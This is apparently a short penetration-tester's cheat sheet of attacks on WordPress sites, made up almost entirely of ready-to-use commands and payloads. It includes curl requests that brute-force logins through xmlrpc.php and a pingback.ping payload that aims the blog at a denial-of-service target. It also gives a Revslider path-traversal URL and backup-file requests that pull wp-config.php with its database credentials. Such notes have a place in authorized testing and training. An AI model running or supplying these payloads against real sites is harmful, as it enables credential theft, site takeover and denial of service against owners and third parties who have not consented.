WordPress
xmlrpc.php
Brute Force
curl -X POST -d "<methodCall><methodName>wp.getUsersBlogs</methodName><params>
<param><value>admin</value></param><param><value>pass</value></param></params></methodCall>" http://examplewp.com/xmlrpc.php
DOS
curl -X POST -d "<methodCall><methodName>system.listMethods</methodName><params></params></methodCall>" http://examplewp.com/xmlrpc.php
The response will be a list of available methods.
<?xml version="1.0" encoding="UTF-8"?>
<methodResponse>
<params>
<param>
<value>
<array><data>
<value><string>system.listMethods</string></value>
<value><string>system.getCapabilities</string></value>
<value><string>pingback.extensions.getPingbacks</string></value>
<value><string>pingback.ping</string></value>
<value><string>mt.publishPost</string></value>
**** truncated ****
Note the pingback.ping indicating pingback is enabled. Use the following data for the pingback attempt.
<methodCall>
<methodName>pingback.ping</methodName>
<params><param>
<value><string>http://**denial-of-service-target**:**portno**</string></value>
</param><param><value><string>http://**blog-url-from-wp**</string>
</value></param></params>
</methodCall>
Plugins that Display
beware of plugins that display files
Revslider Method
https://examplewp.com/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php
forgotten.files
likely manual backup
curl https://testwordsite.com/wp-config.php.bak
Vim backup artifact
curl https://testwordpressite.com/.wp-config.php.swp